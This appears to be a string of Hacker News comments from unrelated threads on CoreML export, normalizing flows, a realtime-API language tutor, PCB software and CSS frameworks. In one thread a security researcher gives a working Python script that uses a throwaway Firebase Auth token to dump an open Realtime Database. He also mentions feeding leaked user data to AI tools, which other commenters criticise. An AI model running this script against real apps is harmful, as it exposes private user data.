I do a lot of AI work, and right now the story for doing LLMs on iOS is very painful (though Whisper and the like are pretty nice), so this is exciting. The API looks Swift-native and great, I can't wait to use it!
Question/feature request: Is it possible to bring my own CoreML models over and use them? I honestly end up bundling llama.cpp and doing GGUF right now because I can't figure out the setup for using CoreML models; I'd love for all of that to be abstracted away for me :)
That’s a good suggestion, and it indeed sounds like something we’d want to support. Could you help us better understand your use case? For example, where do you usually get the models (e.g., Hugging Face)? Do you fine-tune them? Do you mostly care about LLMs (since you only mentioned llama.cpp)?
Thank you! I've been fine-tuning tiny Llama and Gemma models using transformers, then exporting from the safetensors it spits out. My main use case is LLMs, but I've also tried getting a fine-tuned YOLO and other PyTorch models running and ran into similar problems; it just seemed very confusing to figure out how to properly use the phone for this.
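For reference, the conversion dance I'm describing looks roughly like this (just a sketch: the checkpoint path, shapes, and deployment target are placeholders, and real LLM exports need a lot more care around fixed shapes, KV caches, quantization, etc.):

    # Rough sketch of the PyTorch -> CoreML export path; everything here is a placeholder.
    import numpy as np
    import torch
    import coremltools as ct
    from transformers import AutoModelForCausalLM

    class LogitsOnly(torch.nn.Module):
        """Wrap the HF model so tracing sees a plain tensor output."""
        def __init__(self, model):
            super().__init__()
            self.model = model
        def forward(self, input_ids):
            return self.model(input_ids=input_ids).logits

    hf = AutoModelForCausalLM.from_pretrained("./my-finetuned-tinyllama")  # local safetensors checkpoint
    hf.eval()

    example = torch.zeros((1, 128), dtype=torch.int64)  # (batch, seq_len)
    traced = torch.jit.trace(LogitsOnly(hf), example)

    mlmodel = ct.convert(
        traced,
        inputs=[ct.TensorType(name="input_ids", shape=example.shape, dtype=np.int32)],
        minimum_deployment_target=ct.target.iOS17,
    )
    mlmodel.save("TinyLlama.mlpackage")

Having all of that (plus the Swift loading side) abstracted away would be amazing.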
Thanks for sharing the details; that makes a lot of sense. Fine-tuning models and exporting them for on-device use can be tedious right now.
We're planning to look into supporting popular on-device LLMs more directly, so deployment feels much easier. We'll let you know here or reach out to you once we have something.
Hi all, I'm the security researcher mentioned in the article -- just to be clear:
1. The leak on Friday was from Firebase's file storage service
2. This one is about their Firebase database service also being open (up until Saturday morning)
The tl;dr is:
1. App signed up using Firebase Auth
2. App traded Firebase Auth token to API for API token
3. API talked to Firebase DB
The issue is that you could just take the Firebase Auth key, talk to Firebase directly, and because they had read/write/update/delete permissions open to all users, it opened up an IDOR exploit.
I pulled the data Friday night to have evidence proving the information wasn't old like the previous leak, and immediately reached out to 404media.
And to be 100% clear, the data in this second "leak" is a 300MB JSON file that (hopefully) only exists on my computer, but I did see evidence that other people were communicating with the Firebase database directly.
If anyone is interested in the how: I signed up against Firebase Auth using a dummy email and password, retrieved an idToken, sent it into the script generated by this Claude convo: https://claude.ai/share/2c53838d-4d11-466b-8617-eae1a1e84f56
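In case it saves anyone a click, the core of the script is just two REST calls (the API key, project name, and database path below are placeholders, not the real ones):

    # Sketch of the two REST calls involved; API key, project, and path are placeholders.
    import requests

    API_KEY = "AIza..."          # the app's public Firebase API key
    PROJECT = "example-project"  # the app's Firebase project

    # 1. Sign up a throwaway account against Firebase Auth to get an idToken.
    signup = requests.post(
        f"https://identitytoolkit.googleapis.com/v1/accounts:signUp?key={API_KEY}",
        json={"email": "dummy@example.com", "password": "correct-horse-battery", "returnSecureToken": True},
    )
    id_token = signup.json()["idToken"]

    # 2. Talk to the Realtime Database directly with that token. With the rules
    #    left open to any authenticated user, this dumps whatever lives at the path.
    dump = requests.get(
        f"https://{PROJECT}-default-rtdb.firebaseio.com/users.json",
        params={"auth": id_token},
    )
    print(dump.json())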
Doesn't that Gemini summary gist tie usernames to pretty specific highly personal non-public stories? That seems like a significant violation of ethical hacking principles.
They're anonymous usernames the app had users make, and users were told not to use anything they'd shared elsewhere. I googled them and couldn't uniquely identify anyone from them.
They seem generic enough that I think it's okay, but you're right, there was no need to include them and I should've caught that in the AI output. Thank you!!
I think including specific stories is already an ethical hacking violation.
Including the pseudonyms associated with those stories creates unnecessary risk for those individuals, and arguably an incentive to deanonymize them.
I also just don't get the mindset of dumping something like this into an AI tool for a summary. You say "a 300MB JSON file that (hopefully) only exists on my computer", but then you exposed part of that data to generate an AI summary.
Having the file on your computer is questionable enough, but not treating it as something private to be professionally protected is, IMHO, another ethical violation.
I don't see the need for the AI output to begin with. Normally pen testers just demonstrate breaches; this is more like exposing what users do on the app.
Yes! haha! But hopefully I have a good enough support group and connections that I'll be okay if that happens. I just really wanted to prove that they were not being honest when they said it was data from prior to 2024.
I've been trying to keep up with this field (image generation), so here are some quick notes I took:
Claude's Summary: "Normalizing flows aren't dead, they just needed modern techniques"
My Summary: "Transformers aren't just for text"
1. SOTA model for likelihood on ImageNet 64×64: first ever sub-3.2 bits per dimension; the previous was 2.99, by a hybrid diffusion model
2. It's an autoregressive (transformer) approach; right now diffusion is the most popular in this space (diffusion is much faster, but a different approach)
tl;dr of autoregressive vs diffusion (there are also other approaches):
Autoregression: step-based, generate a little, then a bit more, then more
Diffusion: generate a lot of noise then try to clean it up
The diffusion approach that is the baseline for SOTA is Flow Matching from Meta: https://arxiv.org/abs/2210.02747 -- lots of fun reading material if you throw both of these papers into an LLM and ask it to summarize the approaches!
You have a few minor errors and I hope I can help out.
> Diffusion: generate a lot of noise then try to clean it up
You could say this about Flows too. Their history is shared with diffusion and goes back to the Whitening Transform. Flows work via a coordinate transform, so we get an isomorphism, whereas diffusion works (to put it in easier terms) through a hierarchical mixture of Gaussians, which is a lossy process (it gets more confusing once we get into latent diffusion models, which are the primary type used). The goal of a Normalizing Flow is to turn your sampling distribution, which you don't have an explicit representation of, into a known probability distribution (typically a Gaussian). So in effect, there are a lot of similarities here. I'd highly suggest learning about Flows if you want to better understand Diffusion Models.
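To make the "coordinate transform" point concrete, here's a toy whitening-style flow with an exact log-likelihood via change of variables (purely illustrative; this isn't Flow Matching, just the simplest possible flow):

    # Toy normalizing flow: one invertible affine (whitening-style) transform.
    # The key idea is the exact change-of-variables log-likelihood:
    #   log p_x(x) = log p_z(f(x)) + log |det df/dx|
    import numpy as np

    mu, log_sigma = np.array([2.0, -1.0]), np.array([0.5, 1.0])  # would be learned in a real flow

    def forward(x):
        """Map data x to latent z (the goal: z ~ N(0, I))."""
        return (x - mu) / np.exp(log_sigma)

    def inverse(z):
        """Sample by pushing Gaussian noise back through the transform."""
        return z * np.exp(log_sigma) + mu

    def log_likelihood(x):
        z = forward(x)
        log_pz = -0.5 * np.sum(z**2 + np.log(2 * np.pi), axis=-1)  # standard normal log-density
        log_det = -np.sum(log_sigma)                               # log |det| of the affine Jacobian
        return log_pz + log_det

    x = inverse(np.random.default_rng(0).standard_normal((5, 2)))  # samples from the model
    print(log_likelihood(x))  # exact densities -- nothing lossy in the transform

Stack many such invertible transforms and make them continuous in time, and you're most of the way to the continuous flows that Flow Matching trains.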
> The diffusion approach that is the baseline for sota is Flow Matching from Meta
To be clear, Flow Matching is a Normalizing Flow. Specifically, it is a Continuous and Conditional Normalizing Flow. If you want to get into the nitty gritty, Ricky has a really good tutorial on the stuff[0]
It uses OpenAI's realtime API to simulate either a tutoring session (where the speaker will revert to English to help you) or a first date or business meeting (where the speaker will always stay in the target language).
You can see the AI's transcriptions but not your own; that's a limitation of the current OpenAI API, but definitely something I can fix.
I'm not fully in love with the app yet, so I'd love any feedback, or to hear whether it works well for you -- it doesn't have a lot of features yet (including saving context), and if you bump into the time limit, just open it in incognito to keep going.
This is great! Maybe some more tourist-related scenarios, like "ordering at restaurant", "resolving dispute about rental car crash" etc? :-)
The "next level" feature would be to get it to speak even simpler, with some hints about how to reply, for the beginners. I don't know how that would ideally look, but maybe a button to pop up some "key words" or phrases that one could use? (Even so, I found myself using the little I know, so it's obviously somehow working even though my knowledge is extremely basic.)
This is one of the places where I feel LLMs can do something good for the world: giving a safe playground for getting experience speaking new languages without the anxiety of performing badly in front of other people, and hopefully making it easier to connect with real people in that language later.
One small piece of feedback… There were a couple times where I asked to learn something, and it asked me to repeat a phrase back, which was great. But when I repeated it back, I know I didn’t quite nail it (eg perhaps said “un” instead of “una”) and rather than correcting me, it actually told me I did it perfectly. Maybe there’s some tuning with the prompts that may help turn down the natural sycophancy of the model and make sure it’s a little more strict.
Amazing idea! Do you think this should be a freeform text field where the user can add their own prompts, or a checkbox/select on the homepage so the user can pick from a limited set?
Did you just add Dutch as per the submitter’s request or was it part of your plan prior?
Curious because I'm trying to learn Romanian, and since it's a less common language there are fewer resources available. So I wasn't sure if you added Dutch with a minimal amount of effort following the poster's request.
That said, I gave your app a try with Spanish and it looks pretty good! But I didn't see a Help page to clarify how I'm "supposed" to interact. E.g., I tried saying in English "I don't understand" (even though I know how to say that in Spanish) and it responded in Spanish, which may be hard for absolute beginners. Although full immersion is a much better way to learn.
I can try playing around more with it to give you some feedback.
> E.g., I tried saying in English "I don't understand" (even though I know how to say that in Spanish) and it responded in Spanish, which may be hard for absolute beginners.
I tried to use ChatGPT as a "live" translator with my in-laws, and I noticed it is extremely bad at language "consistency" and at understanding your intent when it comes to multiple languages.
It will sometimes respond in English when you talk to it in the foreign language, it will sometimes assume that a clear instruction like "repeat the last sentence" needs to be translated, etc.
I don't know how the person above is approaching the problem, but your experience is consistent with mine, and I don't think GenAI models (at least OpenAI's) are suitable for the task.
I'm a native Dutch speaker and tried this out for a bit. It works impressively well, although it might be challenging for complete beginners. Maybe you can add an option for the trainer to use simpler language for beginners?
I tried practicing some verb conjugations. The trainer displayed some fill-in-the-blank sentences like "she ... home after class", asking me to conjugate "to walk" in that sentence. However, the audio actually pronounced the full sentence "she walks home after class", giving away the answer.
Just tried this for Spanish and it works incredibly well. I have been hacking on something similar for translation (it's really quite easy too, just a few prompts), but I was using Google Translate's interface for vocalizing! This is seriously good stuff, really nice work putting it together.
I will probably use something like this for language practice.
I just tried it and it works perfectly. The color scheme and font size could be touched up to look better. Just out of curiosity, is $10/month enough to cover the (unlimited) API cost? Have you estimated what percentage of your users will use more than $10 of API fees each month?
Thanks so much for trying it out! The realtime API is actually very cheap, especially for short connections: a user who uses it 30 minutes a day, every day for a month, costs me ~$5, and I assume the average user is going to use it way less than that (although I have 0 users right now haha)
I've used the realtime API for something similar (also related to practicing speaking, though not for foreign languages). I just wanted to comment that the realtime API will definitely give you the user's transcriptions -- they come back as a `server.conversation.item.input_audio_transcription.completed` event. I use it in my app for exactly that purpose.
Thank you so much!! While the transcription is technically in the API, it's not a native part of the model and runs through Whisper separately. In my testing, I often end up with a transcription in a different language than what the user is speaking, and the current API has no way to force a language on the internal Whisper call.
If the language is correct, a lot of the time the exact text isn't 100% accurate; and when it is 100% accurate, it comes in slower than the audio output and not in real time. All in all, not what I would consider ready to release as a feature in my app.
What I've been thinking about is switching to a full audio in --> transcribe --> send to LLM --> TTS pipeline, in which case I would be able to show the exact input to the model, but that's way more work than just one single OpenAI API call.
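If I go that route, it would look roughly like this with the standard OpenAI endpoints (a sketch only; the model choices, prompt, and language are placeholders):

    # Sketch of the STT -> LLM -> TTS pipeline; model names, prompt, and language are placeholders.
    from openai import OpenAI

    client = OpenAI()

    # 1. Speech to text: now I'd have the user's exact transcript to display.
    with open("user_turn.wav", "rb") as audio:
        transcript = client.audio.transcriptions.create(
            model="whisper-1", file=audio, language="es"
        )

    # 2. LLM turn in the target language.
    reply = client.chat.completions.create(
        model="gpt-4o-mini",
        messages=[
            {"role": "system", "content": "You are a friendly Spanish tutor. Reply in simple Spanish."},
            {"role": "user", "content": transcript.text},
        ],
    )

    # 3. Text to speech for the tutor's reply.
    speech = client.audio.speech.create(
        model="tts-1", voice="alloy", input=reply.choices[0].message.content
    )
    speech.write_to_file("tutor_turn.mp3")

The tradeoff is latency: three round trips per turn instead of one streaming connection.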
Heyo, I work on the realtime API. This is a very cool app!
With transcription I would recommend trying out "gpt-4o-transcribe" or "gpt-4o-mini-transcribe" models, which will be more accurate than "whisper-1". On any model you can set the language parameter, see docs here: https://platform.openai.com/docs/api-reference/realtime-clie.... This doesn't guarantee ordering relative to the rest of the response, but the idea is to optimize for conversational-feeling latency. Hope this is helpful.
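For reference, the transcription settings live in the session config, so something along these lines (the language code here is just an example):

    # Example session.update payload enabling input transcription with a language hint;
    # "nl" is just an example language code, and ws is an already-open realtime websocket.
    import json

    session_update = {
        "type": "session.update",
        "session": {
            "input_audio_transcription": {
                "model": "gpt-4o-transcribe",  # or "gpt-4o-mini-transcribe"
                "language": "nl",
            }
        },
    }
    # ws.send(json.dumps(session_update))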
Ah yes, I've seen that occasionally too, but it hasn't been a big enough issue for me to block adoption in a non-productized tool.
I actually implemented the STT -> LLM -> TTS pipeline, too, and I allow users to switch between them. It's far less interactive, but it also gives much higher quality responses.
This is super cool (I do a LOT of React Native after years of doing native development) -- one thing I'd love: easy upgrades. Right now, if I leave an RN app for a while, getting it to compile on the latest iOS/Android again requires a lot of manual labor and reviewing rn-diff-purge. Good luck on the project!
Autodesk bought EAGLE in 2016, so just about ten years between acquisition and discontinuation.
EAGLE is the first PCB design app I learned (and had a harder onramp than React) so this is sad, but it is important to note that most hobbyists have already switched over to KiCad: https://www.kicad.org/
Even professionally, some of the places I worked at lately preferred KiCad because you can check libraries and projects into git and see meaningful diffs.
I'm not sure if you realize that EAGLE is fully embedded and rebranded within Fusion 360, so you will have access to the same functionality, but in an integrated environment (for better or worse).
Speaking as a subscriber to Fusion: Do-it-all software is nearly always inferior to special purpose software. I don't use the built-in Eagle functionality in Fusion even though I've paid for it.
Yeah, I have no love for Autodesk as a begrudging Fusion 360 user, but on the surface, ten years before sunsetting an acquired product, while also integrating it into an existing platform in that same timeframe, is pretty good as far as product acquisitions go from an end-user perspective.
Surprised it lasted that long. This reminds me of when they bought out Softimage in 2009 because XSI might have grown into something that challenged Maya, then released the last version in 2014 after delivering five years of barely any new features.
It's anecdotal, but I just recently started getting into more hardware-oriented stuff and found that KiCad came recommended for PCB design/etc. I found it to be pretty useful, but I'm too much of a novice to really give it a fair shake.
My advice to new KiCad users is to watch someone on YouTube go through a familiar project and see what their flow is, then try to create your own project from design to implementation. Next, check out the KiCad library guidelines to see what it takes to create a library part so you can get everything right. Lastly, open up the shortcuts screen so you can see which key does what; you'll pick up the most common ones quickly, and the others you'll see as you go through the menus.
I also used EAGLE first, briefly, for hobbyist work right after it got acquired, but my team soon switched to Altium, which seemed maybe too powerful for my needs. I used KiCad afterwards, and it works on Mac like EAGLE did.
Love running into old friends on HN. So, some very stale info from someone who hasn't worked at SO in many years: while the job board was differentiated and nice from the programmer's side, it's really difficult to convince recruiters to use a new system with new rules. Most (not all, of course) just want to spray and pray.
As a job seeker, being told "you're gonna have the upper hand here" is amazing; as a recruiter, it makes the product very difficult to sell unless you really own the market.
Why would they offer him a job right before saying that? Some of it could be true, absolutely, but it seems more emotionally manipulative than anything else, to me. The CEO was mad so he said something.
> Why would they offer him a job right before saying that?
A few people have mentioned that on this thread, but I don't think it's in sync with the reality of how incredibly hard it is to hire technical talent right now, esp talent that knows your systems well.
It's entirely possible for someone to be the most demanding intern a co has ever had and still be a great hire; hell, it might even be _correlated_. Interns usually haven't figured out workplace norms yet, and combining that with being smart and driven could easily yield good-faith behavior that nevertheless is "demanding" (for example, asking lots of questions about tasks he's given, asking for guidance with parts of the system he's not working on, etc etc). In that case, I would absolutely want to hire that intern, with the understanding that he'd need to get better at the cultural aspects of the job once he joined full-time (as all intern conversions do).
That being said, no question that it was a bizarre and immature thing for the CEO to bring up, and I don't disagree with your characterization of it as "emotionally manipulative".
I'm looking at this from the perspective of "is the emotion/frustration felt by the CEO valid?" In other words, did this open source author actually do ANYTHING which could cause frustration in a previous employer? An important part of that is whether they were actually a 50% pain-in-the-ass employee who was repeatedly pushy (but still perhaps hireable because they were a net positive).
I'm disregarding any commentary on actual action taken by the CEO, because as I said I think it's incredibly stupid and immature.
This reply below by @treis is a good explanation of how I feel about the answer to your question.
> Lots of CEOs/Owners will definitely be salty about that. And they're not totally wrong to feel that way. You pay someone a bunch of money only to watch them walk and help your competitor take your market share. It's understandable why that's upsetting. But they should have the maturity to understand that's how the world works and not throw a tantrum.
This Wikipedia list is missing a lot of APIs; it seems more focused on products. For example, the QPX API (which I used) was shut down this April and is nowhere in that list. Your numbers are lower than they should be.
A notable one there would be the recent incident where Twitter bought some ML startup for abuse analysis and shut down its customers overnight with almost no warning.
The framework being advertised as a minimal, lightweight framework while having its size compared only to the biggest frameworks is a bit off-putting to me.
I get that they wouldn't want to advertise their competitors, but the comparison matrix on the page makes mini.css seem tiny, whereas a Google search shows it's the biggest of the popular frameworks like this.
Mini.css is 7KB gzipped; Milligram[0] (the first Google result I see for "minimalist css framework"; mini.css is second) is 2KB gzipped, and Pure.css[1] (the third result) is 3.8KB gzipped.
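(For anyone who wants to reproduce the numbers, this is roughly how I'm measuring; the file names are whatever you download from each project:)

    # Rough way to reproduce the size comparison; file names are placeholders.
    import gzip
    from pathlib import Path

    for css in ["mini.min.css", "milligram.min.css", "pure-min.css"]:
        raw = Path(css).read_bytes()
        print(f"{css}: {len(raw)/1024:.1f}KB min, {len(gzip.compress(raw, 9))/1024:.1f}KB gzipped")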
Such a pity you didn't include my own, Picnic CSS[2]. One of its main features is being lightweight (7KB min+gzip, same as mini.css), and it is also popular (2,177 stars). It focuses on beautiful and cohesive components out of the box:
Thanks! It's a pity that the SCSS is basically undocumented, as I use it in most projects and it has really awesome features that only I know about. But the time sink would be tremendous, and I'm focusing on another project right now.
I guess it's a translation issue; no need to insult me. The tone was intended to be totally different: the first one like "hey, take a look at this" and the second one more like "I wish I could have done it" (and because of the different feeling, I didn't realize I had already used the same expression before).
Nice! While you are at it, I also have a production-ready JS library, https://umbrellajs.com/, and an experimental, not-so-browser-compatible one, https://superdom.site/, in case you are interested.
BTW, I cannot seem to find the people behind it; the "About" page only says "This website was made by people. In the interests of inclusivity, we're aiming to get some robots to contribute soon."
Seems a bit lame to complain that someone chooses to not reveal who they are.
Frankly, I think you need to be less aggressive shilling your own projects in a "competitor's" submission. ctrl-f for your own username. It's a bit much.
But I wasn't complaining at all! I was just curious about who was behind it, so I pointed it out just in case it was an error in the code or in my browser.
And sure, I am passionate about minimal programming, so I've done quite a few projects and point them out as relevant examples. Though I agree I got a bit carried away (3 comment threads with external links) in this thread, my apologies (cannot change it now). See my submission history ( https://news.ycombinator.com/threads?id=franciscop ) for a full picture; I don't link to my projects nearly as much as I did in here, and I'll just comment relevant info without so many external links in the future.
About the "about" page, the site is quite unfinished :( I want to add more information, examples and resources, but have fallen behind. I hope to fix that quite soon.
Also a lot of the frameworks compared against are totally modular, so comparing against the full framework size doesn't really mean a lot, because it almost never makes sense to include every framework module.
E.g., in Bootstrap 3, if you only want typography it's 9kb min / 2.8kb gz; for typography + forms + buttons it's 27kb min / 5.kb gz; for all 'common CSS' (incl. grid + responsive utilities) it's 46kb min / 8.8kb gz.
The comparison size of 20kb gz is only if you pulled in every additional component available.
Both of those are gorgeous. Mini.css, not so much. I mean, Mini is fine...better than I could do. But, when I visit, I feel neutral about it. I can't imagine it improving my projects just by including it. And, the example of Mini customization (http://codepen.io/chalarangelo/pen/YNKYgz) is downright ugly.
I use CSS frameworks (mostly Bootstrap) because I suck at design. I need a hand up, and a good framework provides it. Customization is necessary, but not all that's necessary.